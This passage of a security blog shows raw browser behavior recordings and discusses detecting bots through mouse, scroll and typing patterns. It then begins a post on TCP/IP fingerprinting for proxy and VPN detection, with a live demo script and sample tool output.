class="p">,</span><span class="mf">406</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1845.63</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1045</span><span class="p">,</span><span class="mf">313</span><span class="p">,</span><span class="mf">2965</span><span class="p">,</span><span class="mf">414</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1863.225</span><span class="p">],[</span><span class="s2">"m"</span><span 
class="p">,</span><span class="mf">1047</span><span class="p">,</span><span class="mf">314</span><span class="p">,</span><span class="mf">2967</span><span class="p">,</span><span class="mf">415</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2086.09</span><span class="p">]</span>
<span class="p">,[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1047</span><span class="p">,</span><span class="mf">317</span><span class="p">,</span><span class="mf">2967</span><span class="p">,</span><span class="mf">418</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2095.995</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1047</span><span class="p">,</span><span class="mf">319</span><span class="p">,</span><span class="mf">2967</span><span class="p">,</span><span class="mf">420</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2113.245</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1046</span><span class="p">,</span><span class="mf">323</span><span class="p">,</span><span class="mf">2966</span><span class="p">,</span><span class="mf">424</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2129.86</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1046</span><span class="p">,</span><span class="mf">324</span><span class="p">,</span><span class="mf">2966</span><span class="p">,</span><span class="mf">425</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2146.645</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1046</span><span 
class="p">,</span><span class="mf">329</span><span class="p">,</span><span class="mf">2966</span><span class="p">,</span><span class="mf">430</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2162.54</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1045</span><span class="p">,</span><span class="mf">333</span><span class="p">,</span><span class="mf">2965</span><span class="p">,</span><span class="mf">434</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2179.16</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1045</span><span class="p">,</span><span class="mf">334</span><span class="p">,</span><span class="mf">2965</span><span class="p">,</span><span class="mf">435</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2198.62</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1041</span><span class="p">,</span><span class="mf">335</span><span class="p">,</span><span class="mf">2961</span><span class="p">,</span><span class="mf">436</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2423.58</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1030</span><span class="p">,</span><span class="mf">335</span><span class="p">,</span><span class="mf">2950</span><span class="p">,</span><span 
class="mf">436</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2431.07</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1005</span><span class="p">,</span><span class="mf">329</span><span class="p">,</span><span class="mf">2925</span><span class="p">,</span><span class="mf">430</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2446.315</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">887</span><span class="p">,</span><span class="mf">299</span><span class="p">,</span><span class="mf">2807</span><span class="p">,</span><span class="mf">400</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2463.15</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">793</span><span class="p">,</span><span class="mf">269</span><span class="p">,</span><span class="mf">2713</span><span class="p">,</span><span class="mf">370</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2479.685</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">695</span><span class="p">,</span><span class="mf">245</span><span class="p">,</span><span class="mf">2615</span><span class="p">,</span><span class="mf">346</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span 
class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2496.445</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">617</span><span class="p">,</span><span class="mf">221</span><span class="p">,</span><span class="mf">2537</span><span class="p">,</span><span class="mf">322</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2512.475</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">553</span><span class="p">,</span><span class="mf">193</span><span class="p">,</span><span class="mf">2473</span><span class="p">,</span><span class="mf">294</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2530.245</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">507</span><span class="p">,</span><span class="mf">173</span><span class="p">,</span><span class="mf">2427</span><span class="p">,</span><span class="mf">274</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2545.655</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">475</span><span class="p">,</span><span class="mf">155</span><span class="p">,</span><span class="mf">2395</span><span class="p">,</span><span class="mf">256</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2563.26</span><span class="p">],[</span><span 
class="s2">"m"</span><span class="p">,</span><span class="mf">459</span><span class="p">,</span><span class="mf">147</span><span class="p">,</span><span class="mf">2379</span><span class="p">,</span><span class="mf">248</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2579.82</span><span class="p">],</span>
<span class="p">[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">458</span><span class="p">,</span><span class="mf">145</span><span class="p">,</span><span class="mf">2378</span><span class="p">,</span><span class="mf">246</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2596.655</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">456</span><span class="p">,</span><span class="mf">143</span><span class="p">,</span><span class="mf">2376</span><span class="p">,</span><span class="mf">244</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2671.46</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">449</span><span class="p">,</span><span class="mf">140</span><span class="p">,</span><span class="mf">2369</span><span class="p">,</span><span class="mf">241</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2679.625</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">434</span><span class="p">,</span><span class="mf">137</span><span class="p">,</span><span class="mf">2354</span><span class="p">,</span><span class="mf">238</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2695.88</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">415</span><span class="p">,</span><span 
class="mf">135</span><span class="p">,</span><span class="mf">2335</span><span class="p">,</span><span class="mf">236</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2712.485</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">398</span><span class="p">,</span><span class="mf">132</span><span class="p">,</span><span class="mf">2318</span><span class="p">,</span><span class="mf">233</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2729.495</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">382</span><span class="p">,</span><span class="mf">130</span><span class="p">,</span><span class="mf">2302</span><span class="p">,</span><span class="mf">231</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2746.1</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">369</span><span class="p">,</span><span class="mf">126</span><span class="p">,</span><span class="mf">2289</span><span class="p">,</span><span class="mf">227</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2762.54</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">357</span><span class="p">,</span><span class="mf">121</span><span class="p">,</span><span class="mf">2277</span><span class="p">,</span><span class="mf">222</span><span 
class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2779.69</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">353</span><span class="p">,</span><span class="mf">117</span><span class="p">,</span><span class="mf">2273</span><span class="p">,</span><span class="mf">218</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2796.41</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">347</span><span class="p">,</span><span class="mf">112</span><span class="p">,</span><span class="mf">2267</span><span class="p">,</span><span class="mf">213</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2813.59</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">342</span><span class="p">,</span><span class="mf">104</span><span class="p">,</span><span class="mf">2262</span><span class="p">,</span><span class="mf">205</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2829.67</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">340</span><span class="p">,</span><span class="mf">94</span><span class="p">,</span><span class="mf">2260</span><span class="p">,</span><span class="mf">195</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">2846.54</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">340</span><span class="p">,</span><span class="mf">82</span><span class="p">,</span><span class="mf">2260</span><span class="p">,</span><span class="mf">183</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2863.09</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">340</span><span class="p">,</span><span class="mf">74</span><span class="p">,</span><span class="mf">2260</span><span class="p">,</span><span class="mf">175</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2879.195</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">340</span><span class="p">,</span><span class="mf">68</span><span class="p">,</span><span class="mf">2260</span><span class="p">,</span><span class="mf">169</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2896.52</span><span class="p">],</span>
<span class="p">[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">343</span><span class="p">,</span><span class="mf">63</span><span class="p">,</span><span class="mf">2263</span><span class="p">,</span><span class="mf">164</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2913.185</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">349</span><span class="p">,</span><span class="mf">56</span><span class="p">,</span><span class="mf">2269</span><span class="p">,</span><span class="mf">157</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2929.87</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">356</span><span class="p">,</span><span class="mf">49</span><span class="p">,</span><span class="mf">2276</span><span class="p">,</span><span class="mf">150</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2945.855</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">360</span><span class="p">,</span><span class="mf">42</span><span class="p">,</span><span class="mf">2280</span><span class="p">,</span><span class="mf">143</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2962.555</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">363</span><span class="p">,</span><span 
class="mf">38</span><span class="p">,</span><span class="mf">2283</span><span class="p">,</span><span class="mf">139</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2979.245</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">363</span><span class="p">,</span><span class="mf">36</span><span class="p">,</span><span class="mf">2283</span><span class="p">,</span><span class="mf">137</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2995.905</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">363</span><span class="p">,</span><span class="mf">35</span><span class="p">,</span><span class="mf">2283</span><span class="p">,</span><span class="mf">136</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3013.1</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">363</span><span class="p">,</span><span class="mf">32</span><span class="p">,</span><span class="mf">2283</span><span class="p">,</span><span class="mf">133</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3030.145</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">364</span><span class="p">,</span><span class="mf">30</span><span class="p">,</span><span class="mf">2284</span><span class="p">,</span><span class="mf">131</span><span 
class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3045.57</span><span class="p">],</span>
<span class="p">[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">365</span><span class="p">,</span><span class="mf">24</span><span class="p">,</span><span class="mf">2285</span><span class="p">,</span><span class="mf">125</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3063.08</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">367</span><span class="p">,</span><span class="mf">18</span><span class="p">,</span><span class="mf">2287</span><span class="p">,</span><span class="mf">119</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3079.46</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">369</span><span class="p">,</span><span class="mf">11</span><span class="p">,</span><span class="mf">2289</span><span class="p">,</span><span class="mf">112</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3096.24</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">371</span><span class="p">,</span><span class="mf">4</span><span class="p">,</span><span class="mf">2291</span><span class="p">,</span><span class="mf">105</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3112.335</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">371</span><span class="p">,</span><span 
class="mf">2</span><span class="p">,</span><span class="mf">2291</span><span class="p">,</span><span class="mf">103</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3126.395</span><span class="p">],</span>
<span class="p">[</span><span class="s2">"bu"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5056.1</span><span class="p">],[</span><span class="s2">"ph"</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5105.305</span><span class="p">],[</span><span class="s2">"vc"</span><span class="p">,</span><span class="s2">"hidden"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5105.48</span><span class="p">],[</span><span class="s2">"ul"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5105.625</span><span class="p">],[</span><span class="s2">"wsEnd"</span><span class="p">,</span><span class="kc">null</span><span class="p">,</span><span class="mf">5105.625</span><span class="p">]</span>
<span class="p">]</span>
</code></pre></div>
<p>where</p>
<ol>
<li><code>s</code> stands for <code>scroll</code> event</li>
<li><code>m</code> stands for <code>mousemove</code></li>
<li><code>dcl</code> is the <code>domcontentloaded</code> event</li>
<li><code>vc</code> is the <code>visibilitychange</code> event</li>
<li>The last array element is always the timestamp obtained with <code>performance.now()</code>. So for example in the frame <code>["s",0,3561,1,1062.775]</code>, 1062.775 is the timestamp.</li>
</ol>
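<p>As a minimal sketch of how such frames could be read, the snippet below only relies on the two facts stated above: the first array element is the event code and the last one is the timestamp. The helper names <code>describeFrame</code> and <code>countEvents</code> are made up for this illustration, and the meaning of the elements in between is deliberately left uninterpreted.</p>

```javascript
// Frames copied from the recording above; only the first and last positions are interpreted.
const frames = [
  ["s", 0, 3561, 1, 1062.775],
  ["m", 371, 2, 2291, 103, 0, "0000", 1, 3126.395],
  ["vc", "hidden", 1, 5105.48],
];

// Long names for the short event codes listed above.
const EVENT_NAMES = new Map([
  ["s", "scroll"],
  ["m", "mousemove"],
  ["dcl", "domcontentloaded"],
  ["vc", "visibilitychange"],
]);

// The first element is the event code, the last one the performance.now() timestamp.
function describeFrame(frame) {
  const code = frame[0];
  return {
    event: EVENT_NAMES.get(code) ?? code, // unknown codes are passed through unchanged
    timestamp: frame[frame.length - 1],
  };
}

// Count how often each event type occurs in a recording.
function countEvents(recording) {
  const counts = {};
  for (const frame of recording) {
    const { event } = describeFrame(frame);
    counts[event] = (counts[event] || 0) + 1;
  }
  return counts;
}

console.log(frames.map(describeFrame));
console.log(countEvents(frames));
```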
<h2>How to Detect Bots with Behavioral Analysis?</h2>
<p>Humans behave like chaotic systems.</p>
<p>Humans move their mouse, keyboard, touch screen and scroll wheel in an organic fashion. Bots still have a hard time mimicking mouse movements and touchscreen taps the way real humans produce them.</p>
<p>A simple process to distinguish bots from real humans based on behavioral data could look like the following:</p>
<ol>
<li>The first step is to collect a large set of recorded behavioral data samples and extract features from them.</li>
<li>The next (and much harder) step is to label the data set as either human or bot-like. This requires enough samples from both categories.</li>
<li>The last step is to train a neural network. This allows us to classify live behavior samples accurately and in real time.</li>
</ol>
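<p>The first step, feature extraction, could be sketched roughly as follows. This is only an illustration and not the code used for this article. It assumes that positions 1 and 2 of an <code>m</code> frame hold the x and y coordinates of the pointer, which the description above does not state, and the function name <code>mouseFeatures</code> is made up.</p>

```javascript
// A few mousemove frames copied from the recording above.
const recording = [
  ["m", 458, 145, 2378, 246, 0, "0000", 1, 2596.655],
  ["m", 456, 143, 2376, 244, 0, "0000", 1, 2671.46],
  ["m", 449, 140, 2369, 241, 0, "0000", 1, 2679.625],
  ["m", 434, 137, 2354, 238, 0, "0000", 1, 2695.88],
];

// Compute simple speed statistics (pixels per millisecond) over consecutive mousemove frames.
// ASSUMPTION: frame[1] and frame[2] are the x and y coordinates of the pointer.
function mouseFeatures(frames) {
  const moves = frames.filter((frame) => frame[0] === "m");
  const speeds = [];
  for (let i = 1; i < moves.length; i++) {
    const [, x0, y0] = moves[i - 1];
    const [, x1, y1] = moves[i];
    const t0 = moves[i - 1][moves[i - 1].length - 1];
    const t1 = moves[i][moves[i].length - 1];
    const dt = t1 - t0;
    if (dt <= 0) continue; // skip frames with identical or out-of-order timestamps
    speeds.push(Math.hypot(x1 - x0, y1 - y0) / dt);
  }
  if (speeds.length === 0) return null; // not enough data for any feature

  const mean = speeds.reduce((sum, s) => sum + s, 0) / speeds.length;
  const variance = speeds.reduce((sum, s) => sum + (s - mean) ** 2, 0) / speeds.length;
  return {
    samples: speeds.length,
    meanSpeed: mean,
    speedStdDev: Math.sqrt(variance),
    maxSpeed: Math.max(...speeds),
  };
}

console.log(mouseFeatures(recording));
```

<p>A vector like this, computed per session, is the kind of input that the labeling and training steps would then work on.</p>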
<p>That is much easier said than done. However, some companies such as <a href="https://www.biocatch.com/">BioCatch</a> and <a href="https://www.perimeterx.com/">PerimeterX</a> have been using this approach for years.</p>
<p>But what exactly makes mouse or touch event interaction in a browser <em>human</em>? What are features that are extremely hard to emulate mechanically? Some rough ideas (replace <em>mouse</em> with touch events in case of mobile devices):</p>
<ul>
<li>The mouse is used as a reading aid (observe yourself <em>right now</em>)</li>
<li>The start and stop speed of the mouse between points of interest</li>
<li>The trajectory of mouse movements</li>
<li>The distribution of events over time. Humans look at the screen, process the information visually and react physically. This pattern repeats all the time. The latency in such reaction patterns is intrinsically human.</li>
<li>Time interval between <code>mousedown</code> and <code>mouseup</code> events</li>
<li>The interval between <code>keydown</code> and <code>keyup</code> events depends heavily on the writing skills of the human</li>
<li>Timing statistics when typing: when the same letter is pressed twice in a row, the second keystroke is almost always faster.</li>
<li>Mouse follows the eye focus point</li>
<li>Scrolling speed correlates with reading speed</li>
<li>Spikes in behavioral data when a website requires interaction</li>
<li>The mouse moves to the top (tabs) when navigating away (not on mobile)</li>
<li>Mobile only: the screen sometimes flips by 180 degrees on auto-rotate</li>
<li>On disinterest, the mouse races very fast to the "close tab" button</li>
<li>Areas of interest in text are highlighted</li>
<li>...?</li>
</ul>
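<p>One of these ideas, the distribution of events over time, is easy to illustrate. In the recording above, <code>mousemove</code> frames arrive roughly every 16 to 17 ms while the mouse is moving, interrupted by much longer gaps. The sketch below finds such pauses in a list of timestamps. The function name <code>findPauses</code> and the 100 ms threshold are assumptions chosen for this example, not values used by any real detection system.</p>

```javascript
// Timestamps (performance.now(), in ms) of consecutive mousemove frames from the recording above.
const timestamps = [1829.455, 1845.63, 1863.225, 2086.09, 2095.995, 2113.245];

// Return every gap between two consecutive events that lasts at least minGapMs.
// ASSUMPTION: 100 ms is an arbitrary threshold picked for illustration.
function findPauses(times, minGapMs = 100) {
  const pauses = [];
  for (let i = 1; i < times.length; i++) {
    const gap = times[i] - times[i - 1];
    if (gap >= minGapMs) {
      pauses.push({ from: times[i - 1], to: times[i], durationMs: gap });
    }
  }
  return pauses;
}

console.log(findPauses(timestamps));
```

<p>The number, length and position of such pauses could then serve as features next to the speed and trajectory of the movements.</p>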
<p>The established method to distinguish humans from bots is the good old captcha. However, we are approaching an age where <a href="https://incolumitas.com/2021/01/02/breaking-audio-recaptcha-with-googles-own-speech-to-text-api/">captchas can be solved</a> better by AI than by real humans.</p>
<h2>Limitations of Behavioral Bot Detection</h2>
<p>There are some limitations regarding bot detection with behavioral analysis:</p>
<ol>
<li>
<p>Behavioral analysis needs some sampling time before there is enough data to properly classify the recorded behavior. Put differently: when relying on behavioral analysis alone, bots can wreak havoc in the first seconds after page load (let's say 0 to 5 seconds).</p>
</li>
<li>
<p>What happens when a bot injects behavioral data that was recorded somewhere else (for example on the attacker's own website)? Without knowing the intent behind the behavioral data, it is impossible to detect that the recorded behavior is human but originates from <em>somewhere else</em>.</p>
</li>
<li>
<p>Sometimes there is simply no behavioral data to analyze. Internet users sometimes open a web page for later (for example with the middle mouse button) but never choose to interact with the website.</p>
</li>
</ol>
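<p>The first and third limitations suggest that a classifier should know when it has too little data to decide. A rough sketch of such a gate is shown below. The function name <code>readiness</code>, the three return values and both thresholds are assumptions made for this example. Only the 5 second window is borrowed from the estimate above.</p>

```javascript
// Event codes that count as user interaction in this sketch (scroll and mousemove).
const INTERACTION_CODES = new Set(["s", "m"]);

// Decide whether a recording is worth classifying yet.
// ASSUMPTION: minEvents and minDurationMs are illustrative values, not tuned ones.
function readiness(frames, { minEvents = 50, minDurationMs = 5000 } = {}) {
  const interactions = frames.filter((frame) => INTERACTION_CODES.has(frame[0]));
  if (interactions.length === 0) return "no-data"; // e.g. a tab opened in the background

  const first = interactions[0];
  const last = interactions[interactions.length - 1];
  const durationMs = last[last.length - 1] - first[first.length - 1];

  const enough = interactions.length >= minEvents && durationMs >= minDurationMs;
  return enough ? "ready" : "collecting";
}

console.log(readiness([["vc", "hidden", 1, 5105.48]]));
console.log(readiness([["s", 0, 3561, 1, 1062.775]]));
```

<p>While the gate reports <code>collecting</code> or <code>no-data</code>, other signals have to carry the decision, which is exactly the weakness described above.</p>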
<h2>Resources</h2>
<ul>
<li>https://github.com/das-th-koeln/HOSIT</li>
<li>https://epb.bibl.th-koeln.de/frontdoor/deliver/index/docId/1369/file/Risk-based_Authentication_Study_Final.pdf</li>
<li>https://epb.bibl.th-koeln.de/frontdoor/deliver/index/docId/1422/file/Wiefling_HOSIT_NordSec2019.pdf</li>
</ul>TCP/IP Fingerprinting for VPN and Proxy Detection2021-03-13T14:54:00+01:002021-03-19T21:23:00+01:00Nikolai Tschachertag:incolumitas.com,2021-03-13:/2021/03/13/tcp-ip-fingerprinting-for-vpn-and-proxy-detection/<p>TCP/IP fingerprinting is as old as the Internet itself. But this technique seems to have lost its relevance in our modern times. However, with the rise of proxy and VPN providers, TCP/IP fingerprinting becomes interesting again from a security perspective.</p><p><a class="btn" href="https://github.com/NikolaiT/zardaxt/" style="padding: 10px; font-weight: 600; font-size: 15px;">TCP/IP Fingerprinting Tool - GitHub</a></p>
<h2>Live Detection</h2>
<p>Based on your initial TCP/IP SYN packet, your device most likely is:</p>
<pre id="tcpipFp">
...loading
</pre>
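<script>
// Ask the classification API for the TCP/IP fingerprint of the requesting IP address
fetch('https://tcpip.incolumitas.com/classify?by_ip=1')
  .then(response => response.json())
  .then(function(data) {
    document.getElementById('tcpipFp').innerText = JSON.stringify(data, null, 2);
  })
  .catch(function(err) {
    // Show the failure instead of leaving "...loading" on the page forever
    document.getElementById('tcpipFp').innerText = 'Could not load the classification: ' + err;
  });
</script>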
<p>Your User-Agent (<code>navigator.userAgent</code>) says that you are </p>
<pre id="userAgent">
</pre>
<script>
document.getElementById('userAgent').innerText = navigator.userAgent;
</script>
<h2>Examples</h2>
<p><strong>iPhone</strong>: An iPhone (User-Agent: <code>iPhone; CPU iPhone OS 14_4_1 like Mac OS X</code>) visiting my web server. Based on the SYN fingerprint alone, it is not possible to discern whether it is a macOS device or an iOS device. But the classification is good enough to say with high confidence that it is an Apple device.</p>
<div class="highlight"><pre><span></span><code>python tcp_fingerprint.py -i eth0 --classify
Loaded <span class="m">716</span> fingerprints from the database
listening on interface eth0
---------------------------------
<span class="m">1616184541</span>: <span class="m">85</span>.19.65.217:49988 -> <span class="m">167</span>.99.241.135:443 <span class="o">[</span>SYN<span class="o">]</span>
<span class="o">{</span><span class="s1">'avgScoreOsClass'</span>: <span class="o">{</span><span class="s1">'Android'</span>: <span class="s1">'avg=4.18, N=36'</span>,
<span class="s1">'Linux'</span>: <span class="s1">'avg=3.31, N=99'</span>,
<span class="s1">'Windows'</span>: <span class="s1">'avg=3.36, N=365'</span>,
<span class="s1">'iOS'</span>: <span class="s1">'avg=6.95, N=20'</span>,
<span class="s1">'macOS'</span>: <span class="s1">'avg=7.26, N=189'</span><span class="o">}</span>,
